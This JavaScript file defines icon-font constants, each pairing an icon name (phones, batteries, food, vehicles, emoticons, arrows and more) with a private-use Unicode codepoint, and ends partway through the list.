var FLASH_MEMORY = { name: 'flash-memory', content: '\e7a3' };
var USB_DRIVE = { name: 'usb-drive', content: '\e7a4' };
var PHONE = { name: 'phone', content: '\e7a5' };
var SMARTPHONE = { name: 'smartphone', content: '\e7a6' };
var SMARTPHONE_NOTIFICATION = { name: 'smartphone-notification', content: '\e7a7' };
var SMARTPHONE_VIBRATION = { name: 'smartphone-vibration', content: '\e7a8' };
var SMARTPHONE_EMBED = { name: 'smartphone-embed', content: '\e7a9' };
var SMARTPHONE_WAVES = { name: 'smartphone-waves', content: '\e7aa' };
var TABLET = { name: 'tablet', content: '\e7ab' };
var TABLET2 = { name: 'tablet2', content: '\e7ac' };
var LAPTOP = { name: 'laptop', content: '\e7ad' };
var LAPTOP_PHONE = { name: 'laptop-phone', content: '\e7ae' };
var DESKTOP = { name: 'desktop', content: '\e7af' };
var LAUNCH = { name: 'launch', content: '\e7b0' };
var NEW_TAB = { name: 'new-tab', content: '\e7b1' };
var WINDOW = { name: 'window', content: '\e7b2' };
var CABLE = { name: 'cable', content: '\e7b3' };
var CABLE2 = { name: 'cable2', content: '\e7b4' };
var TV = { name: 'tv', content: '\e7b5' };
var RADIO = { name: 'radio', content: '\e7b6' };
var REMOTE_CONTROL = { name: 'remote-control', content: '\e7b7' };
var POWER_SWITCH = { name: 'power-switch', content: '\e7b8' };
var POWER = { name: 'power', content: '\e7b9' };
var POWER_CROSSED = { name: 'power-crossed', content: '\e7ba' };
var FLASH_AUTO = { name: 'flash-auto', content: '\e7bb' };
var LAMP = { name: 'lamp', content: '\e7bc' };
var FLASHLIGHT = { name: 'flashlight', content: '\e7bd' };
var LAMPSHADE = { name: 'lampshade', content: '\e7be' };
var CORD = { name: 'cord', content: '\e7bf' };
var OUTLET = { name: 'outlet', content: '\e7c0' };
var BATTERY_POWER = { name: 'battery-power', content: '\e7c1' };
var BATTERY_EMPTY = { name: 'battery-empty', content: '\e7c2' };
var BATTERY_ALERT = { name: 'battery-alert', content: '\e7c3' };
var BATTERY_ERROR = { name: 'battery-error', content: '\e7c4' };
var BATTERY_LOW1 = { name: 'battery-low1', content: '\e7c5' };
var BATTERY_LOW2 = { name: 'battery-low2', content: '\e7c6' };
var BATTERY_LOW3 = { name: 'battery-low3', content: '\e7c7' };
var BATTERY_MID1 = { name: 'battery-mid1', content: '\e7c8' };
var BATTERY_MID2 = { name: 'battery-mid2', content: '\e7c9' };
var BATTERY_MID3 = { name: 'battery-mid3', content: '\e7ca' };
var BATTERY_FULL = { name: 'battery-full', content: '\e7cb' };
var BATTERY_CHARGING = { name: 'battery-charging', content: '\e7cc' };
var BATTERY_CHARGING2 = { name: 'battery-charging2', content: '\e7cd' };
var BATTERY_CHARGING3 = { name: 'battery-charging3', content: '\e7ce' };
var BATTERY_CHARGING4 = { name: 'battery-charging4', content: '\e7cf' };
var BATTERY_CHARGING5 = { name: 'battery-charging5', content: '\e7d0' };
var BATTERY_CHARGING6 = { name: 'battery-charging6', content: '\e7d1' };
var BATTERY_CHARGING7 = { name: 'battery-charging7', content: '\e7d2' };
var CHIP = { name: 'chip', content: '\e7d3' };
var CHIP_X64 = { name: 'chip-x64', content: '\e7d4' };
var CHIP_X86 = { name: 'chip-x86', content: '\e7d5' };
var BUBBLE = { name: 'bubble', content: '\e7d6' };
var BUBBLES = { name: 'bubbles', content: '\e7d7' };
var BUBBLE_DOTS = { name: 'bubble-dots', content: '\e7d8' };
var BUBBLE_ALERT = { name: 'bubble-alert', content: '\e7d9' };
var BUBBLE_QUESTION = { name: 'bubble-question', content: '\e7da' };
var BUBBLE_TEXT = { name: 'bubble-text', content: '\e7db' };
var BUBBLE_PENCIL = { name: 'bubble-pencil', content: '\e7dc' };
var BUBBLE_PICTURE = { name: 'bubble-picture', content: '\e7dd' };
var BUBBLE_VIDEO = { name: 'bubble-video', content: '\e7de' };
var BUBBLE_USER = { name: 'bubble-user', content: '\e7df' };
var BUBBLE_QUOTE = { name: 'bubble-quote', content: '\e7e0' };
var BUBBLE_HEART = { name: 'bubble-heart', content: '\e7e1' };
var BUBBLE_EMOTICON = { name: 'bubble-emoticon', content: '\e7e2' };
var BUBBLE_ATTACHMENT = { name: 'bubble-attachment', content: '\e7e3' };
var PHONE_BUBBLE = { name: 'phone-bubble', content: '\e7e4' };
var QUOTE_OPEN = { name: 'quote-open', content: '\e7e5' };
var QUOTE_CLOSE = { name: 'quote-close', content: '\e7e6' };
var DNA = { name: 'dna', content: '\e7e7' };
var HEART_PULSE = { name: 'heart-pulse', content: '\e7e8' };
var PULSE = { name: 'pulse', content: '\e7e9' };
var SYRINGE = { name: 'syringe', content: '\e7ea' };
var PILLS = { name: 'pills', content: '\e7eb' };
var FIRST_AID = { name: 'first-aid', content: '\e7ec' };
var LIFEBUOY = { name: 'lifebuoy', content: '\e7ed' };
var BANDAGE = { name: 'bandage', content: '\e7ee' };
var BANDAGES = { name: 'bandages', content: '\e7ef' };
var THERMOMETER = { name: 'thermometer', content: '\e7f0' };
var MICROSCOPE = { name: 'microscope', content: '\e7f1' };
var BRAIN = { name: 'brain', content: '\e7f2' };
var BEAKER = { name: 'beaker', content: '\e7f3' };
var SKULL = { name: 'skull', content: '\e7f4' };
var BONE = { name: 'bone', content: '\e7f5' };
var CONSTRUCTION = { name: 'construction', content: '\e7f6' };
var CONSTRUCTION_CONE = { name: 'construction-cone', content: '\e7f7' };
var PIE_CHART = { name: 'pie-chart', content: '\e7f8' };
var PIE_CHART2 = { name: 'pie-chart2', content: '\e7f9' };
var GRAPH = { name: 'graph', content: '\e7fa' };
var CHART_GROWTH = { name: 'chart-growth', content: '\e7fb' };
var CHART_BARS = { name: 'chart-bars', content: '\e7fc' };
var CHART_SETTINGS = { name: 'chart-settings', content: '\e7fd' };
var CAKE = { name: 'cake', content: '\e7fe' };
var GIFT = { name: 'gift', content: '\e7ff' };
var BALLOON = { name: 'balloon', content: '\e800' };
var RANK = { name: 'rank', content: '\e801' };
var RANK2 = { name: 'rank2', content: '\e802' };
var RANK3 = { name: 'rank3', content: '\e803' };
var CROWN = { name: 'crown', content: '\e804' };
var LOTUS = { name: 'lotus', content: '\e805' };
var DIAMOND = { name: 'diamond', content: '\e806' };
var DIAMOND2 = { name: 'diamond2', content: '\e807' };
var DIAMOND3 = { name: 'diamond3', content: '\e808' };
var DIAMOND4 = { name: 'diamond4', content: '\e809' };
var LINEARICONS = { name: 'linearicons', content: '\e80a' };
var TEACUP = { name: 'teacup', content: '\e80b' };
var TEAPOT = { name: 'teapot', content: '\e80c' };
var GLASS = { name: 'glass', content: '\e80d' };
var BOTTLE2 = { name: 'bottle2', content: '\e80e' };
var GLASS_COCKTAIL = { name: 'glass-cocktail', content: '\e80f' };
var GLASS2 = { name: 'glass2', content: '\e810' };
var DINNER = { name: 'dinner', content: '\e811' };
var DINNER2 = { name: 'dinner2', content: '\e812' };
var CHEF = { name: 'chef', content: '\e813' };
var SCALE2 = { name: 'scale2', content: '\e814' };
var EGG = { name: 'egg', content: '\e815' };
var EGG2 = { name: 'egg2', content: '\e816' };
var EGGS = { name: 'eggs', content: '\e817' };
var PLATTER = { name: 'platter', content: '\e818' };
var STEAK = { name: 'steak', content: '\e819' };
var HAMBURGER = { name: 'hamburger', content: '\e81a' };
var HOTDOG = { name: 'hotdog', content: '\e81b' };
var PIZZA = { name: 'pizza', content: '\e81c' };
var SAUSAGE = { name: 'sausage', content: '\e81d' };
var CHICKEN = { name: 'chicken', content: '\e81e' };
var FISH = { name: 'fish', content: '\e81f' };
var CARROT = { name: 'carrot', content: '\e820' };
var CHEESE = { name: 'cheese', content: '\e821' };
var BREAD = { name: 'bread', content: '\e822' };
var ICE_CREAM = { name: 'ice-cream', content: '\e823' };
var ICE_CREAM2 = { name: 'ice-cream2', content: '\e824' };
var CANDY = { name: 'candy', content: '\e825' };
var LOLLIPOP = { name: 'lollipop', content: '\e826' };
var COFFEE_BEAN = { name: 'coffee-bean', content: '\e827' };
var COFFEE_CUP = { name: 'coffee-cup', content: '\e828' };
var CHERRY = { name: 'cherry', content: '\e829' };
var GRAPES = { name: 'grapes', content: '\e82a' };
var CITRUS = { name: 'citrus', content: '\e82b' };
var APPLE = { name: 'apple', content: '\e82c' };
var LEAF = { name: 'leaf', content: '\e82d' };
var LANDSCAPE = { name: 'landscape', content: '\e82e' };
var PINE_TREE = { name: 'pine-tree', content: '\e82f' };
var TREE = { name: 'tree', content: '\e830' };
var CACTUS = { name: 'cactus', content: '\e831' };
var PAW = { name: 'paw', content: '\e832' };
var FOOTPRINT = { name: 'footprint', content: '\e833' };
var SPEED_SLOW = { name: 'speed-slow', content: '\e834' };
var SPEED_MEDIUM = { name: 'speed-medium', content: '\e835' };
var SPEED_FAST = { name: 'speed-fast', content: '\e836' };
var ROCKET = { name: 'rocket', content: '\e837' };
var HAMMER2 = { name: 'hammer2', content: '\e838' };
var BALANCE = { name: 'balance', content: '\e839' };
var BRIEFCASE = { name: 'briefcase', content: '\e83a' };
var LUGGAGE_WEIGHT = { name: 'luggage-weight', content: '\e83b' };
var DOLLY = { name: 'dolly', content: '\e83c' };
var PLANE = { name: 'plane', content: '\e83d' };
var PLANE_CROSSED = { name: 'plane-crossed', content: '\e83e' };
var HELICOPTER = { name: 'helicopter', content: '\e83f' };
var TRAFFIC_LIGHTS = { name: 'traffic-lights', content: '\e840' };
var SIREN = { name: 'siren', content: '\e841' };
var ROAD = { name: 'road', content: '\e842' };
var ENGINE = { name: 'engine', content: '\e843' };
var OIL_PRESSURE = { name: 'oil-pressure', content: '\e844' };
var COOLANT_TEMPERATURE = { name: 'coolant-temperature', content: '\e845' };
var CAR_BATTERY = { name: 'car-battery', content: '\e846' };
var GAS = { name: 'gas', content: '\e847' };
var GALLON = { name: 'gallon', content: '\e848' };
var TRANSMISSION = { name: 'transmission', content: '\e849' };
var CAR = { name: 'car', content: '\e84a' };
var CAR_WASH = { name: 'car-wash', content: '\e84b' };
var CAR_WASH2 = { name: 'car-wash2', content: '\e84c' };
var BUS = { name: 'bus', content: '\e84d' };
var BUS2 = { name: 'bus2', content: '\e84e' };
var CAR2 = { name: 'car2', content: '\e84f' };
var PARKING = { name: 'parking', content: '\e850' };
var CAR_LOCK = { name: 'car-lock', content: '\e851' };
var TAXI = { name: 'taxi', content: '\e852' };
var CAR_SIREN = { name: 'car-siren', content: '\e853' };
var CAR_WASH3 = { name: 'car-wash3', content: '\e854' };
var CAR_WASH4 = { name: 'car-wash4', content: '\e855' };
var AMBULANCE = { name: 'ambulance', content: '\e856' };
var TRUCK = { name: 'truck', content: '\e857' };
var TRAILER = { name: 'trailer', content: '\e858' };
var SCALE_TRUCK = { name: 'scale-truck', content: '\e859' };
var TRAIN = { name: 'train', content: '\e85a' };
var SHIP = { name: 'ship', content: '\e85b' };
var SHIP2 = { name: 'ship2', content: '\e85c' };
var ANCHOR = { name: 'anchor', content: '\e85d' };
var BOAT = { name: 'boat', content: '\e85e' };
var BICYCLE = { name: 'bicycle', content: '\e85f' };
var BICYCLE2 = { name: 'bicycle2', content: '\e860' };
var DUMBBELL = { name: 'dumbbell', content: '\e861' };
var BENCH_PRESS = { name: 'bench-press', content: '\e862' };
var SWIM = { name: 'swim', content: '\e863' };
var FOOTBALL = { name: 'football', content: '\e864' };
var BASEBALL_BAT = { name: 'baseball-bat', content: '\e865' };
var BASEBALL = { name: 'baseball', content: '\e866' };
var TENNIS = { name: 'tennis', content: '\e867' };
var TENNIS2 = { name: 'tennis2', content: '\e868' };
var PING_PONG = { name: 'ping-pong', content: '\e869' };
var HOCKEY = { name: 'hockey', content: '\e86a' };
var X_8BALL = { name: '8ball', content: '\e86b' };
var BOWLING = { name: 'bowling', content: '\e86c' };
var BOWLING_PINS = { name: 'bowling-pins', content: '\e86d' };
var GOLF = { name: 'golf', content: '\e86e' };
var GOLF2 = { name: 'golf2', content: '\e86f' };
var ARCHERY = { name: 'archery', content: '\e870' };
var SLINGSHOT = { name: 'slingshot', content: '\e871' };
var SOCCER = { name: 'soccer', content: '\e872' };
var BASKETBALL = { name: 'basketball', content: '\e873' };
var CUBE = { name: 'cube', content: '\e874' };
var X_3D_ROTATE = { name: '3d-rotate', content: '\e875' };
var PUZZLE = { name: 'puzzle', content: '\e876' };
var GLASSES = { name: 'glasses', content: '\e877' };
var GLASSES2 = { name: 'glasses2', content: '\e878' };
var ACCESSIBILITY = { name: 'accessibility', content: '\e879' };
var WHEELCHAIR = { name: 'wheelchair', content: '\e87a' };
var WALL = { name: 'wall', content: '\e87b' };
var FENCE = { name: 'fence', content: '\e87c' };
var WALL2 = { name: 'wall2', content: '\e87d' };
var ICONS = { name: 'icons', content: '\e87e' };
var RESIZE_HANDLE = { name: 'resize-handle', content: '\e87f' };
var ICONS2 = { name: 'icons2', content: '\e880' };
var SELECT = { name: 'select', content: '\e881' };
var SELECT2 = { name: 'select2', content: '\e882' };
var SITE_MAP = { name: 'site-map', content: '\e883' };
var EARTH = { name: 'earth', content: '\e884' };
var EARTH_LOCK = { name: 'earth-lock', content: '\e885' };
var NETWORK = { name: 'network', content: '\e886' };
var NETWORK_LOCK = { name: 'network-lock', content: '\e887' };
var PLANET = { name: 'planet', content: '\e888' };
var HAPPY = { name: 'happy', content: '\e889' };
var SMILE = { name: 'smile', content: '\e88a' };
var GRIN = { name: 'grin', content: '\e88b' };
var TONGUE = { name: 'tongue', content: '\e88c' };
var SAD = { name: 'sad', content: '\e88d' };
var WINK = { name: 'wink', content: '\e88e' };
var DREAM = { name: 'dream', content: '\e88f' };
var SHOCKED = { name: 'shocked', content: '\e890' };
var SHOCKED2 = { name: 'shocked2', content: '\e891' };
var TONGUE2 = { name: 'tongue2', content: '\e892' };
var NEUTRAL = { name: 'neutral', content: '\e893' };
var HAPPY_GRIN = { name: 'happy-grin', content: '\e894' };
var COOL = { name: 'cool', content: '\e895' };
var MAD = { name: 'mad', content: '\e896' };
var GRIN_EVIL = { name: 'grin-evil', content: '\e897' };
var EVIL = { name: 'evil', content: '\e898' };
var WOW = { name: 'wow', content: '\e899' };
var ANNOYED = { name: 'annoyed', content: '\e89a' };
var WONDERING = { name: 'wondering', content: '\e89b' };
var CONFUSED = { name: 'confused', content: '\e89c' };
var ZIPPED = { name: 'zipped', content: '\e89d' };
var GRUMPY = { name: 'grumpy', content: '\e89e' };
var MUSTACHE = { name: 'mustache', content: '\e89f' };
var TOMBSTONE_HIPSTER = { name: 'tombstone-hipster', content: '\e8a0' };
var TOMBSTONE = { name: 'tombstone', content: '\e8a1' };
var GHOST = { name: 'ghost', content: '\e8a2' };
var GHOST_HIPSTER = { name: 'ghost-hipster', content: '\e8a3' };
var HALLOWEEN = { name: 'halloween', content: '\e8a4' };
var CHRISTMAS = { name: 'christmas', content: '\e8a5' };
var EASTER_EGG = { name: 'easter-egg', content: '\e8a6' };
var MUSTACHE2 = { name: 'mustache2', content: '\e8a7' };
var MUSTACHE_GLASSES = { name: 'mustache-glasses', content: '\e8a8' };
var PIPE = { name: 'pipe', content: '\e8a9' };
var ALARM = { name: 'alarm', content: '\e8aa' };
var ALARM_ADD = { name: 'alarm-add', content: '\e8ab' };
var ALARM_SNOOZE = { name: 'alarm-snooze', content: '\e8ac' };
var ALARM_RINGING = { name: 'alarm-ringing', content: '\e8ad' };
var BULLHORN = { name: 'bullhorn', content: '\e8ae' };
var HEARING = { name: 'hearing', content: '\e8af' };
var VOLUME_HIGH = { name: 'volume-high', content: '\e8b0' };
var VOLUME_MEDIUM = { name: 'volume-medium', content: '\e8b1' };
var VOLUME_LOW = { name: 'volume-low', content: '\e8b2' };
var VOLUME = { name: 'volume', content: '\e8b3' };
var MUTE = { name: 'mute', content: '\e8b4' };
var LAN = { name: 'lan', content: '\e8b5' };
var LAN2 = { name: 'lan2', content: '\e8b6' };
var WIFI = { name: 'wifi', content: '\e8b7' };
var WIFI_LOCK = { name: 'wifi-lock', content: '\e8b8' };
var WIFI_BLOCKED = { name: 'wifi-blocked', content: '\e8b9' };
var WIFI_MID = { name: 'wifi-mid', content: '\e8ba' };
var WIFI_LOW = { name: 'wifi-low', content: '\e8bb' };
var WIFI_LOW2 = { name: 'wifi-low2', content: '\e8bc' };
var WIFI_ALERT = { name: 'wifi-alert', content: '\e8bd' };
var WIFI_ALERT_MID = { name: 'wifi-alert-mid', content: '\e8be' };
var WIFI_ALERT_LOW = { name: 'wifi-alert-low', content: '\e8bf' };
var WIFI_ALERT_LOW2 = { name: 'wifi-alert-low2', content: '\e8c0' };
var STREAM = { name: 'stream', content: '\e8c1' };
var STREAM_CHECK = { name: 'stream-check', content: '\e8c2' };
var STREAM_ERROR = { name: 'stream-error', content: '\e8c3' };
var STREAM_ALERT = { name: 'stream-alert', content: '\e8c4' };
var COMMUNICATION = { name: 'communication', content: '\e8c5' };
var COMMUNICATION_CROSSED = { name: 'communication-crossed', content: '\e8c6' };
var BROADCAST = { name: 'broadcast', content: '\e8c7' };
var ANTENNA = { name: 'antenna', content: '\e8c8' };
var SATELLITE = { name: 'satellite', content: '\e8c9' };
var SATELLITE2 = { name: 'satellite2', content: '\e8ca' };
var MIC = { name: 'mic', content: '\e8cb' };
var MIC_MUTE = { name: 'mic-mute', content: '\e8cc' };
var MIC2 = { name: 'mic2', content: '\e8cd' };
var SPOTLIGHTS = { name: 'spotlights', content: '\e8ce' };
var HOURGLASS = { name: 'hourglass', content: '\e8cf' };
var LOADING = { name: 'loading', content: '\e8d0' };
var LOADING2 = { name: 'loading2', content: '\e8d1' };
var LOADING3 = { name: 'loading3', content: '\e8d2' };
var REFRESH = { name: 'refresh', content: '\e8d3' };
var REFRESH2 = { name: 'refresh2', content: '\e8d4' };
var UNDO = { name: 'undo', content: '\e8d5' };
var REDO = { name: 'redo', content: '\e8d6' };
var JUMP2 = { name: 'jump2', content: '\e8d7' };
var UNDO2 = { name: 'undo2', content: '\e8d8' };
var REDO2 = { name: 'redo2', content: '\e8d9' };
var SYNC = { name: 'sync', content: '\e8da' };
var REPEAT_ONE2 = { name: 'repeat-one2', content: '\e8db' };
var SYNC_CROSSED = { name: 'sync-crossed', content: '\e8dc' };
var SYNC2 = { name: 'sync2', content: '\e8dd' };
var REPEAT_ONE3 = { name: 'repeat-one3', content: '\e8de' };
var SYNC_CROSSED2 = { name: 'sync-crossed2', content: '\e8df' };
var RETURN = { name: 'return', content: '\e8e0' };
var RETURN2 = { name: 'return2', content: '\e8e1' };
var REFUND = { name: 'refund', content: '\e8e2' };
var HISTORY = { name: 'history', content: '\e8e3' };
var HISTORY2 = { name: 'history2', content: '\e8e4' };
var SELF_TIMER = { name: 'self-timer', content: '\e8e5' };
var CLOCK = { name: 'clock', content: '\e8e6' };
var CLOCK2 = { name: 'clock2', content: '\e8e7' };
var CLOCK3 = { name: 'clock3', content: '\e8e8' };
var WATCH = { name: 'watch', content: '\e8e9' };
var ALARM2 = { name: 'alarm2', content: '\e8ea' };
var ALARM_ADD2 = { name: 'alarm-add2', content: '\e8eb' };
var ALARM_REMOVE = { name: 'alarm-remove', content: '\e8ec' };
var ALARM_CHECK = { name: 'alarm-check', content: '\e8ed' };
var ALARM_ERROR = { name: 'alarm-error', content: '\e8ee' };
var TIMER = { name: 'timer', content: '\e8ef' };
var TIMER_CROSSED = { name: 'timer-crossed', content: '\e8f0' };
var TIMER2 = { name: 'timer2', content: '\e8f1' };
var TIMER_CROSSED2 = { name: 'timer-crossed2', content: '\e8f2' };
var DOWNLOAD = { name: 'download', content: '\e8f3' };
var UPLOAD = { name: 'upload', content: '\e8f4' };
var DOWNLOAD2 = { name: 'download2', content: '\e8f5' };
var UPLOAD2 = { name: 'upload2', content: '\e8f6' };
var ENTER_UP = { name: 'enter-up', content: '\e8f7' };
var ENTER_DOWN = { name: 'enter-down', content: '\e8f8' };
var ENTER_LEFT = { name: 'enter-left', content: '\e8f9' };
var ENTER_RIGHT = { name: 'enter-right', content: '\e8fa' };
var EXIT_UP = { name: 'exit-up', content: '\e8fb' };
var EXIT_DOWN = { name: 'exit-down', content: '\e8fc' };
var EXIT_LEFT = { name: 'exit-left', content: '\e8fd' };
var EXIT_RIGHT = { name: 'exit-right', content: '\e8fe' };
var ENTER_UP2 = { name: 'enter-up2', content: '\e8ff' };
var ENTER_DOWN2 = { name: 'enter-down2', content: '\e901' };
var ENTER_VERTICAL = { name: 'enter-vertical', content: '\e902' };
var ENTER_LEFT2 = { name: 'enter-left2', content: '\e903' };
var ENTER_RIGHT2 = { name: 'enter-right2', content: '\e904' };
var ENTER_HORIZONTAL = { name: 'enter-horizontal', content: '\e905' };
var EXIT_UP2 = { name: 'exit-up2', content: '\e906' };
var EXIT_DOWN2 = { name: 'exit-down2', content: '\e907' };
var EXIT_LEFT2 = { name: 'exit-left2', content: '\e908' };
var EXIT_RIGHT2 = { name: 'exit-right2', content: '\e909' };
var CLI = { name: 'cli', content: '\e90a' };
var BUG = { name: 'bug', content: '\e90b' };
var CODE = { name: 'code', content: '\e90c' };
var FILE_CODE = { name: 'file-code', content: '\e90d' };
var FILE_IMAGE = { name: 'file-image', content: '\e90e' };
var FILE_ZIP = { name: 'file-zip', content: '\e90f' };
var FILE_AUDIO = { name: 'file-audio', content: '\e910' };
var FILE_VIDEO = { name: 'file-video', content: '\e911' };
var FILE_PREVIEW = { name: 'file-preview', content: '\e912' };
var FILE_CHARTS = { name: 'file-charts', content: '\e913' };
var FILE_STATS = { name: 'file-stats', content: '\e914' };
var FILE_SPREADSHEET = { name: 'file-spreadsheet', content: '\e915' };
var LINK = { name: 'link', content: '\e916' };
var UNLINK = { name: 'unlink', content: '\e917' };
var LINK2 = { name: 'link2', content: '\e918' };
var UNLINK2 = { name: 'unlink2', content: '\e919' };
var THUMBS_UP = { name: 'thumbs-up', content: '\e91a' };
var THUMBS_DOWN = { name: 'thumbs-down', content: '\e91b' };
var THUMBS_UP2 = { name: 'thumbs-up2', content: '\e91c' };
var THUMBS_DOWN2 = { name: 'thumbs-down2', content: '\e91d' };
var THUMBS_UP3 = { name: 'thumbs-up3', content: '\e91e' };
var THUMBS_DOWN3 = { name: 'thumbs-down3', content: '\e91f' };
var SHARE = { name: 'share', content: '\e920' };
var SHARE2 = { name: 'share2', content: '\e921' };
var SHARE3 = { name: 'share3', content: '\e922' };
var MAGNIFIER = { name: 'magnifier', content: '\e923' };
var FILE_SEARCH = { name: 'file-search', content: '\e924' };
var FIND_REPLACE = { name: 'find-replace', content: '\e925' };
var ZOOM_IN = { name: 'zoom-in', content: '\e926' };
var ZOOM_OUT = { name: 'zoom-out', content: '\e927' };
var LOUPE = { name: 'loupe', content: '\e928' };
var LOUPE_ZOOM_IN = { name: 'loupe-zoom-in', content: '\e929' };
var LOUPE_ZOOM_OUT = { name: 'loupe-zoom-out', content: '\e92a' };
var CROSS = { name: 'cross', content: '\e92b' };
var MENU = { name: 'menu', content: '\e92c' };
var LIST = { name: 'list', content: '\e92d' };
var LIST2 = { name: 'list2', content: '\e92e' };
var LIST3 = { name: 'list3', content: '\e92f' };
var MENU2 = { name: 'menu2', content: '\e930' };
var LIST4 = { name: 'list4', content: '\e931' };
var MENU3 = { name: 'menu3', content: '\e932' };
var EXCLAMATION2 = { name: 'exclamation2', content: '\e933' };
var QUESTION = { name: 'question', content: '\e934' };
var CHECK = { name: 'check', content: '\e935' };
var CROSS2 = { name: 'cross2', content: '\e936' };
var PLUS = { name: 'plus', content: '\e937' };
var MINUS = { name: 'minus', content: '\e938' };
var PERCENT = { name: 'percent', content: '\e939' };
var CHEVRON_UP = { name: 'chevron-up', content: '\e93a' };
var CHEVRON_DOWN = { name: 'chevron-down', content: '\e93b' };
var CHEVRON_LEFT = { name: 'chevron-left', content: '\e93c' };
var CHEVRON_RIGHT = { name: 'chevron-right', content: '\e93d' };
var CHEVRONS_EXPAND_VERTICAL = { name: 'chevrons-expand-vertical', content: '\e93e' };
var CHEVRONS_EXPAND_HORIZONTAL = { name: 'chevrons-expand-horizontal', content: '\e93f' };
var CHEVRONS_CONTRACT_VERTICAL = { name: 'chevrons-contract-vertical', content: '\e940' };
var CHEVRONS_CONTRACT_HORIZONTAL = { name: 'chevrons-contract-horizontal', content: '\e941' };
var ARROW_UP = { name: 'arrow-up', content: '\e942' };
var ARROW_DOWN = { name: 'arrow-down', content: '\e943' };
var ARROW_LEFT = { name: 'arrow-left', content: '\e944' };
var ARROW_RIGHT = { name: 'arrow-right', content: '\e945' };
var ARROW_UP_RIGHT = { name: 'arrow-up-right', content: '\e946' };
var ARROWS_MERGE = { name: 'arrows-merge', content: '\e947' };
var ARROWS_SPLIT = { name: 'arrows-split', content: '\e948' };
var ARROW_DIVERT = { name: 'arrow-divert', content: '\e949' };
var ARROW_RETURN = { name: 'arrow-return', content: '\e94a' };
var EXPAND = { name: 'expand', content: '\e94b' };
var CONTRACT = { name: 'contract', content: '\e94c' };
var EXPAND2 = { name: 'expand2', content: '\e94d' };
var CONTRACT2 = { name: 'contract2', content: '\e94e' };
var MOVE = { name: 'move', content: '\e94f' };
var TAB = { name: 'tab', content: '\e950' };
var ARROW_WAVE = { name: 'arrow-wave', content: '\e951' };
var EXPAND3 = { name: 'expand3', content: '\e952' };
var EXPAND4 = { name: 'expand4', content: '\e953' };
var CONTRACT3 = { name: 'contract3', content: '\e954' };
var NOTIFICATION = { name: 'notification', content: '\e955' };
var WARNING = { name: 'warning', content: '\e956' };
var NOTIFICATION_CIRCLE = { name: 'notification-circle', content: '\e957' };
var QUESTION_CIRCLE = { name: 'question-circle', content: '\e958' };
var MENU_CIRCLE = { name: 'menu-circle', content: '\e959' };
var CHECKMARK_CIRCLE = { name: 'checkmark-circle', content: '\e95a' };
var CROSS_CIRCLE = { name: 'cross-circle', content: '\e95b' };
var PLUS_CIRCLE = { name: 'plus-circle', content: '\e95c' };
var CIRCLE_MINUS = { name: 'circle-minus', content: '\e95d' };
var PERCENT_CIRCLE = { name: 'percent-circle', content: '\e95e' };
var ARROW_UP_CIRCLE = { name: 'arrow-up-circle', content: '\e95f' };
var ARROW_DOWN_CIRCLE = { name: 'arrow-down-circle', content: '\e960' };
var ARROW_LEFT_CIRCLE = { name: 'arrow-left-circle', content: '\e961' };
var ARROW_RIGHT_CIRCLE = { name: 'arrow-right-circle', content: '\e962' };
var CHEVRON_UP_CIRCLE = { name: 'chevron-up-circle', content: '\e963' };
var CHEVRON_DOWN_CIRCLE = { name: 'chevron-down-circle', content: '\e964' };
var CHEVRON_LEFT_CIRCLE = { name: 'chevron-left-circle', content: '\e965' };
var CHEVRON_RIGHT_CIRCLE = { name: 'chevron-right-circle', content: '\e966' };
var BACKWARD_CIRCLE = { name: 'backward-circle', content: '\e967' };
var FIRST_CIRCLE = { name: 'first-circle', content: '\e968' };
var PREVIOUS_CIRCLE = { name: 'previous-circle', content: '\e969' };
var STOP_CIRCLE = { name: 'stop-circle', content: '\e96a' };
var PLAY_CIRCLE = { name: 'play-circle', content: '\e96b' };
var PAUSE_CIRCLE = { name: 'pause-circle', content: '\e96c' };
var NEXT_CIRCLE = { name: 'next-circle', content: '\e96d' };
var LAST_CIRCLE = { name: 'last-circle', content: '\e96e' };
var FORWARD_CIRCLE = { name: 'forward-circle', content: '\e96f' };
var EJECT_CIRCLE = { name: 'eject-circle', content: '\e970' };
var CROP = { name: 'crop', content: '\e971' };
var FRAME_EXPAND = { name: 'frame-expand', content: '\e972' };
var FRAME_CONTRACT = { name: 'frame-contract', content: '\e973' };
var FOCUS = { name: 'focus', content: '\e974' };
var GRID = { name: 'grid', content: '\e976' };
var GRID_CROSSED = { name: 'grid-crossed', content: '\e977' };
var LAYERS = { name: 'layers', content: '\e978' };
var LAYERS_CROSSED = { name: 'layers-crossed', content: '\e979' };
var TOGGLE = { name: 'toggle', content: '\e97a' };
var RULERS = { name: 'rulers', content: '\e97b' };
var RULER = { name: 'ruler', content: '\e97c' };
var FUNNEL1 = { name: 'funnel1', content: '\e97d' };
var FLIP_HORIZONTAL = { name: 'flip-horizontal', content: '\e97e' };
var FLIP_VERTICAL = { name: 'flip-vertical', content: '\e97f' };
var FLIP_HORIZONTAL2 = { name: 'flip-horizontal2', content: '\e980' };
var FLIP_VERTICAL2 = { name: 'flip-vertical2', content: '\e981' };
var ANGLE = { name: 'angle', content: '\e982' };
var ANGLE2 = { name: 'angle2', content: '\e983' };
var SUBTRACT = { name: 'subtract', content: '\e984' };
var COMBINE = { name: 'combine', content: '\e985' };
var INTERSECT = { name: 'intersect', content: '\e986' };
var EXCLUDE = { name: 'exclude', content: '\e987' };
var ALIGN_CENTER_VERTICAL = { name: 'align-center-vertical', content: '\e988' };
var ALIGN_RIGHT = { name: 'align-right', content: '\e989' };
var ALIGN_BOTTOM = { name: 'align-bottom', content: '\e98a' };
var ALIGN_LEFT = { name: 'align-left', content: '\e98b' };
var ALIGN_CENTER_HORIZONTAL = { name: 'align-center-horizontal', content: '\e98c' };
var ALIGN_TOP = { name: 'align-top', content: '\e98d' };
var SQUARE = { name: 'square', content: '\e98e' };
var PLUS_SQUARE = { name: 'plus-square', content: '\e98f' };
var MINUS_SQUARE = { name: 'minus-square', content: '\e990' };
var PERCENT_SQUARE = { name: 'percent-square', content: '\e991' };
var ARROW_UP_SQUARE = { name: 'arrow-up-square', content: '\e992' };
var ARROW_DOWN_SQUARE = { name: 'arrow-down-square', content: '\e993' };
var ARROW_LEFT_SQUARE = { name: 'arrow-left-square', content: '\e994' };
var ARROW_RIGHT_SQUARE = { name: 'arrow-right-square', content: '\e995' };
var CHEVRON_UP_SQUARE = { name: 'chevron-up-square', content: '\e996' };
var CHEVRON_DOWN_SQUARE = { name: 'chevron-down-square', content: '\e997' };
var CHEVRON_LEFT_SQUARE = { name: 'chevron-left-square', content: '\e998' };
